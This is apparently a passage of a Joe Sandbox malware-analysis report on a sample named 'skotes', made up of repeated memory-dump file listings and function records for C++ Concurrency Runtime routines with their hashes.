                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::invalid_argument::invalid_argument
                                                          • String ID: pEvents
                                                          • API String ID: 2141394445-2498624650
                                                          • Opcode ID: 8464a62e9c26c1d99af1202968cbd384bc3958c3c3552805d13b7fffe83e8d07
                                                          • Instruction ID: 0f0a2cd2c854c0ee3a0890935925782a13a2d34ae3ce7a017a5b4342cba16ba1
                                                          • Opcode Fuzzy Hash: 8464a62e9c26c1d99af1202968cbd384bc3958c3c3552805d13b7fffe83e8d07
                                                          • Instruction Fuzzy Hash: DC815A31D0021E9BCF25DFA8C981BBEB7F5EF05310F1440A9E611B7292DB74AA49CB91
                                                          APIs
                                                          • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00C126E3
                                                            • Part of subcall function 00C124E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C12504
                                                          • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00C12704
                                                          • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00C12711
                                                          • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00C1275F
                                                          • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 00C127E6
                                                          • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00C127F9
                                                          • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00C12846
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                          • String ID:
                                                          • API String ID: 2530155754-0
                                                          • Opcode ID: 28d11c1e848a8504664aa5aaff7135c0b70e50f33c4659fb6972e6e99d6688fc
                                                          • Instruction ID: 7f8979861173463856a7eafb329df2c960164acb530f7c51c02bdcccf6e9c803
                                                          • Opcode Fuzzy Hash: 28d11c1e848a8504664aa5aaff7135c0b70e50f33c4659fb6972e6e99d6688fc
                                                          • Instruction Fuzzy Hash: E7819039900249ABDF169F54C951BFE7BB1AF47304F044098ED512B292C7368EB6FBA1
                                                          APIs
                                                          • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00C12982
                                                            • Part of subcall function 00C124E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C12504
                                                          • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00C129A3
                                                          • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00C129B0
                                                          • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00C129FE
                                                          • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00C12AA6
                                                          • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00C12AD8
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                          • String ID:
                                                          • API String ID: 1256429809-0
                                                          • Opcode ID: c043043f568a9362ec302967fae5d831350c5bb7b9160ab776bb542027a0c3de
                                                          • Instruction ID: edabf576b618e90c507ad9a28aa6bfe8fcb00e8af22a6c6fe90dc12b06b0a782
                                                          • Opcode Fuzzy Hash: c043043f568a9362ec302967fae5d831350c5bb7b9160ab776bb542027a0c3de
                                                          • Instruction Fuzzy Hash: 47719D38904249AFDF15DF54C891BFEBBB5AF46304F044098EC526B292C7319EA6FB61
                                                          APIs
                                                          • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00C02876
                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00C028DF
                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00C02913
                                                            • Part of subcall function 00C007ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 00C0080D
                                                          • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00C02993
                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00C029DB
                                                            • Part of subcall function 00C007C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00C007DE
                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00C029EF
                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00C02A00
                                                          • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00C02A4D
                                                          • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00C02A7E
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                          • String ID:
                                                          • API String ID: 1321587334-0
                                                          • Opcode ID: 772c0c76559214a52eb5cb0df6e40a7b6d682ed33ee81293a7e01dc3cb3e8077
                                                          • Instruction ID: 75001f7c50efb50d7465325a20a1b279f611ad90e2a78bad0d40f9a5d789516a
                                                          • Opcode Fuzzy Hash: 772c0c76559214a52eb5cb0df6e40a7b6d682ed33ee81293a7e01dc3cb3e8077
                                                          • Instruction Fuzzy Hash: AA81DE35B006169FCB18DFA9D898BADB7B1FB49304B25402DE455E72D2DB30AE41DB90
                                                          APIs
                                                          • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00C06A1F
                                                          • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00C06A51
                                                          • List.LIBCONCRT ref: 00C06A8C
                                                          • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00C06A9D
                                                          • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00C06AB9
                                                          • List.LIBCONCRT ref: 00C06AF4
                                                          • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00C06B05
                                                          • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00C06B20
                                                          • List.LIBCONCRT ref: 00C06B5B
                                                          • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00C06B68
                                                            • Part of subcall function 00C05EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00C05EF7
                                                            • Part of subcall function 00C05EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00C05F09
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
